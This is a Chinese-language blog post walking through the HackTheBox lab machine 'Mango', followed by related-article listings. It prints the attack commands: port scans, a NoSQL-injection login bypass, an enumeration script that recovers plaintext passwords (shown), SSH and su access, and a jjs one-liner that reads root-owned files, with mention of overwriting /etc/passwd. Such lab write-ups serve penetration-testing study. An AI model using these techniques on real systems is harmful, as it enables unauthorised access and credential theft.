HackTheBox::Mango

最新推荐文章于 2024-05-10 17:54:56 发布
最新推荐文章于 2024-05-10 17:54:56 发布
阅读量225 收藏 1
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127294718
版权

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.162
image.png
nmap -Pn -sCV -p 22,80,443 10.10.10.162
image.png
访问80端口提示403,访问443端口是一个搜索功能,经测试没有可利用的地方。
通过查看网站证书,得到一个子域名:staging-order.mango.htb
image.png
把staging-order.mango.htb添加到hosts文件中,可以访问该子域看到一个登录界面。
image.png

0x01 漏洞利用

登录处尝试SQL注入,失败
image.png
通过google查找关于MongoDB的注入,发现大部分内容与NoSQL注入有关。
https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#mongodb-payloads
使用payload成功绕过登录。
image.png
进入后台后,并未发现可利用信息。
image.png
在github中找到一个nosql的枚举利用脚本
https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login -m post

得到两个用户名:admin、mango
image.png

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep password -op login:login -m post

得到密码:h3mXK8RhU~f{]f5H、t9KcS3>!0B#2
image.png
通过ssh登录尝试,mango用户可以成功登录,但权限较低。
image.png
admin用户无法使用ssh登录,尝试使用su提升到admin用户
image.png
成功获得user.txt

0x02 权限提升

image.png
上传linpeas.sh至目标机器进行枚举
image.png
https://gtfobins.github.io/gtfobins/jjs/
直接使用File read读取root.txt文件即可

echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }' | jjs

image.png
其他利用方式:
利用Write file写入ssh_key或者写入/etc/passwd

aya3t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mango:芒果管理员
03-22
站点地址官方网站: : 文档地址: : 演示地址: ://ruanzubao.com/mango(账号:admin,密码:123456。说明:仅查看信息的权限)代码仓库GitHub地址: : Gitee地址: : 项目特性快速CURD命令行一键生成控制器,模型...
Hack the box -- 靶机渗透测试(TIER2)
wjishuxiaobai的博客
06-25 1637
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机,靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
hackthebox-Mangomongodb渗透 & jjs提权)
冬萍子癸水
02-14 1382
这台靶机太卡了。无语 1、扫描 很常规的22可能有ssh登录,80,443web信息搜集 另外结果显示扫描出新地址staging-order.mango.htb,加到本机/etc/hosts C:\root> masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-14 00:21:45 GMT -- forced o
HACKTHEBOX --Mongod
最新发布
renielnxy的博客
05-10 662
这就是一道简单的关于MongoDB的靶机,简单熟悉一下相关语法即可。
【Hack The Box】linux练习-- Mango
人间体佐菲的博客
11-22 343
【Hack The Box】linux练习-- Mango
hack the box靶场fawn靶机
zr1213159840的博客
03-15 3288
首先打开靶机,回答几个问题 第一个问题:ftp的全称是什么? 答案:File Transfer Protocol 第二个问题:ftp协议的通信模型是什么? 答案:一般由bs和cs两种,ftp是cs的,即client-server model 第三个问题:一种流行的ftpgui程序是什么? 答案:搜了半天,是FileZilla,百度搜流行的ftp程序就能找到 第四个问题:ftp跑在哪个端口,基于什么协议? 答案:ftp是跑在tcp协议之上的,其中21是控制端口,20是数据传输端口,所以说服务跑在哪个端
芒果:具有许多功能的实用@discord机器人:mango:
02-17
芒果 :mango: Mango是经过验证的使用Typescript制造的Discord机器人,它将帮助您非常轻松地管理服务器。目录介绍我在2019年6月左右启动了这个机器人,作为一个夏季项目来学习如何编写代码。 我为此进行了非常艰苦的...
作品集:Mango API:作品集
02-25
【标题】:“作品集:Mango API:作品集”揭示了一个与内容管理系统相关的项目,其中Mango API可能是核心组件。这个API可能是一个用Go语言开发的接口,用于处理和管理内容。 【描述】:“厘米内容管理系统”暗示了...
Mango:芒果分选比赛
03-28
芒果芒果分选比赛型号:i。 建筑学 预处理:i。 方法:(i)我把所有图片的尺寸调整成相同大小(200 X 200)s,因为是彩色图片,所以尺寸为3,再加上标签,故输入为:(200,200,3,X)(ii)随后利用特征增强将调整...
芒果::sparkles::mango:芒果! :mango::sparkles:-使用以太坊智能合约构建应用程序的最快方法
02-02
:mango:使用以太坊智能合约构建应用程序的最快方法Mangoes使用Vue(Nuxt)作为前端,并拥有使用Zeppelin-os智能合约框架在以太坊区块链上构建分布式应用程序所需的一切。 芒果开始: yarn start资源:
HTB-Mango
TA不懒,但还没有添加简介
04-10 668
HTB-Mango
【Hack The Box】linux练习-- Node
人间体佐菲的博客
11-10 563
【Hack The Box】linux练习-- Node
Hack the box靶机 Mango
菜浪马废的博客
05-26 228
网站不能访问 所以在/etc/hosts里加入 10.10.10.162 mango.htb 绕过教程 但是登录了没啥用也 枚举脚本 admin的密码不能登录 但是mango的可以 https://gtfobins.github.io/gtfobins/jjs/ jjs可以利用
No.177-HackTheBox-Linux-Mango-Walkthrough渗透学习
qq_34801745的博客
07-29 334
** HackTheBox-Linux-Mango-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/214 靶机难度:初级(4.1/10) 靶机发布日期:2020年4月14日 靶机描述: Mango is a medium difficulty Linux machine hosting a website that is found vulnerable to NoSQL injection. The NoSQL da
【HTB系列】靶机Mischief的渗透测试详解
大方子
01-06 3227
这次的目标靶机是 hackthebox的 Mischief IP地址:10.10.10.92 ====================================================================================== 首先我们用nmap对目标机器进行扫描 nmap -T4 -sV -p- 10.10.10.92 我们访...
升级mongo遇到的坑
tjzc1352640的博客
06-22 964
升级后远程连接无效 修改/etc/mongd.conf配置文件,将bindIp注释掉 重启mongo服务,但遇到service mongod restart无效 sudo /usr/bin/mongod --confif /etc/mongod.conf 升级升级后Mongo出现Failed to restart mongod....
pymango用法总结(转载)
我不会玩csdn,我兄弟没面子。
06-02 1217
https://blog.csdn.net/Jump_Chaofan/article/details/89387152
MongoDB 各个位版本下载地址
热门推荐
Alvin_Lam的专栏
07-09 1万+
官网首页下载需要填写资料windows版本Linux版本 转自:https://blog.csdn.net/jdmxi/article/details/79492049
以下字典fruits中是某水果店现有的水果报价,假设此水果店又新进了一种水果,将该种水新进的水果及其报价由键盘输入,以逗号分隔,然后输出水果店所有水果及其报价。完善代 输入输出示例: 示例1 输入:杨桃,15 输出: apple:10 mango:12 durian:20 banana:5 杨桃:15 示例2 输入:草莓,30 输出: apple:10 mango:12 durian:20 banana:5 草莓:30 ,,,
05-31
可以使用以下Python代码实现: ...mango:12 durian:20 banana:5 杨桃:15 ``` 示例2 输入: ``` 请输入新水果及其报价,以逗号分隔:草莓,30 ``` 输出: ``` apple:10 mango:12 durian:20 banana:5 草莓:30 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值